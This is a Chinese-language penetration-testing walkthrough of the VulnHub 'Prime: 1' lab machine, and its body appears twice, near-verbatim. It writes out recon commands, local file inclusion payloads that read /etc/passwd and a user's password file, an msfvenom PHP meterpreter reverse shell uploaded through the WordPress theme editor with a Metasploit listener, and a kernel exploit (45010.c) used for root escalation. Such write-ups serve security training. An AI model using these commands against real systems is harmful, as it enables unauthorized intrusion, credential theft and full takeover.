Prime: 1靶场渗透测试

Prime: 1

来自 < Prime: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.207

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.207

开启了http服务,访问之

然后对网站子目录进行扫描枚举

dirsearch -u http://192.168.23.207 -x 403,404

存在wordpress登录页面

http://192.168.23.207/wordpress/wp-login.php

whatweb -v http://192.168.23.207/wordpress/wp-login.php

http://192.168.23.207/dev

发现提示

dirb http://192.168.23.207/ -X .txt,.php,.zip

http://192.168.23.207/secret.txt

4,测试index.php的参数,执行如下命令

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.23.207/index.php?FUZZ

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.23.207/index.php?FUZZ

根据提示查看 location.txt 文件

curl http://192.168.23.207/index.php?file=location.txt

提示使用secrettier360参数在其他的PHP页面上进行挖掘信息

5,可能存在文件包含漏洞,可以wufzz进行测试

http://192.168.23.207/image.php?secrettier360=/etc/passwd

成功包含了/etc/passwd,说明存在本地文件包含漏洞。然后再获取这个页面

curl http://192.168.23.207/image.php?secrettier360=/etc/passwd

通过观察上述的提示发现密码放在/home/saket/password.txt,结合刚才发现的读取文件到漏洞,我们构造一个payload去读取用户密码

curl http://192.168.23.207/image.php?secrettier360=/home/saket/password.txt

发现了密码是:follow_the_ippsec

6,然后尝试ssh登录。失败,原来是登录网站的密码。然后需要获取网站登录的用户名

wpscan --url http://192.168.23.207/wordpress/ --enumerate u

victor/follow_the_ippsec

7,成功登录wordpress。登录进入之后,利用主题编辑器(Appearance-Theme Editor)的漏洞进行反弹代码的上传。通过msfvenom直接生成一个php反弹shell代码更新到目标文件secret.php然后配置好metasploit访问secret.php即可拿shell。生成反弹shell命令如下:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.23.182 lport=4444 -o shell.php

然后上传文件,上传成功

8,使用msfconsle开启对4444端口的监听

msfconsle

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.23.182

set lport 4444

run

然后访问 http://192.168.23.207/wordpress/wp-content/themes/twentynineteen/secret.php 成功触发

9,使用python模块构成可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

然后再查看操作系统内核版本

然后搜索这个版本的操作系统有无漏洞

searchsploit ubuntu 16.04

根据内核版本这里选择45010.c进行提权操作

searchsploit -m 45010.c

10,首先对exp文件进行编译(这一步错误)。需要让靶场下载未编译的exp原文件,然后再进行编译

kali开启http服务

python -m http.server

gcc 45010.c -o 45010

chmod 777 45010.c
Prime: 1

来自 < Prime: 1 ~ VulnHub>

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.182,靶场IP192.168.23.207

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.207

开启了http服务,访问之

然后对网站子目录进行扫描枚举

dirsearch -u http://192.168.23.207 -x 403,404

存在wordpress登录页面

http://192.168.23.207/wordpress/wp-login.php

whatweb -v http://192.168.23.207/wordpress/wp-login.php

http://192.168.23.207/dev

发现提示

dirb http://192.168.23.207/ -X .txt,.php,.zip

http://192.168.23.207/secret.txt

4,测试index.php的参数,执行如下命令

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.23.207/index.php?FUZZ

wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 12 http://192.168.23.207/index.php?FUZZ

根据提示查看 location.txt 文件

curl http://192.168.23.207/index.php?file=location.txt

提示使用secrettier360参数在其他的PHP页面上进行挖掘信息

5,可能存在文件包含漏洞,可以wufzz进行测试

http://192.168.23.207/image.php?secrettier360=/etc/passwd

成功包含了/etc/passwd,说明存在本地文件包含漏洞。然后再获取这个页面

curl http://192.168.23.207/image.php?secrettier360=/etc/passwd

通过观察上述的提示发现密码放在/home/saket/password.txt,结合刚才发现的读取文件到漏洞,我们构造一个payload去读取用户密码

curl http://192.168.23.207/image.php?secrettier360=/home/saket/password.txt

发现了密码是:follow_the_ippsec

6,然后尝试ssh登录。失败,原来是登录网站的密码。然后需要获取网站登录的用户名

wpscan --url http://192.168.23.207/wordpress/ --enumerate u

victor/follow_the_ippsec

7,成功登录wordpress。登录进入之后,利用主题编辑器(Appearance-Theme Editor)的漏洞进行反弹代码的上传。通过msfvenom直接生成一个php反弹shell代码更新到目标文件secret.php然后配置好metasploit访问secret.php即可拿shell。生成反弹shell命令如下:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.23.182 lport=4444 -o shell.php

然后上传文件,上传成功

8,使用msfconsle开启对4444端口的监听

msfconsle

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set lhost 192.168.23.182

set lport 4444

run

然后访问 http://192.168.23.207/wordpress/wp-content/themes/twentynineteen/secret.php 成功触发

9,使用python模块构成可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

然后再查看操作系统内核版本

然后搜索这个版本的操作系统有无漏洞

searchsploit ubuntu 16.04

根据内核版本这里选择45010.c进行提权操作

searchsploit -m 45010.c

10,首先对exp文件进行编译(这一步错误)。需要让靶场下载未编译的exp原文件,然后再进行编译

kali开启http服务

python -m http.server

gcc 45010.c -o 45010

chmod 777 45010.c

然后执行这个文件./45010

提权成功,成为root用户

然后执行这个文件./45010

提权成功,成为root用户

相关推荐
上海云盾-小余20 小时前
DDoS 攻击全解析:常见类型识别与分层防御思路
网络协议·tcp/ip·安全·ddos
www43920 小时前
Vulinbox(敏感信息与敏感文件泄露)
安全
乾元20 小时前
《硅基之盾》番外篇二:算力底座的暗战——智算中心 VXLAN/EVPN 架构下的多租户隔离与防御
网络·人工智能·网络安全·架构
aWty_20 小时前
实分析入门(1)--皮亚诺和自然数
学习
QYR_1120 小时前
2026塑料芯片卡产业全景:供应链成本结构与数字化安全趋势深度洞察
安全·市场调研
weixin_5134499620 小时前
walk_these_ways项目学习记录第八篇(通过行为多样性 (MoB) 实现地形泛化)--策略网络
开发语言·人工智能·python·学习
LX5677721 小时前
传统编辑如何考取AI内容编辑师认证?学习路径详解
人工智能·学习
songyuc21 小时前
BM2『链表内指定区间反转』学习笔记
学习·链表
L16247621 小时前
Kubernetes 完整学习手册(1 主多从 + 纯 YAML 部署 + 访问原理)
学习·容器·kubernetes
南湖北漠21 小时前
记录生活中的那些小事(佚名)
网络·人工智能·计算机网络·其他·安全·生活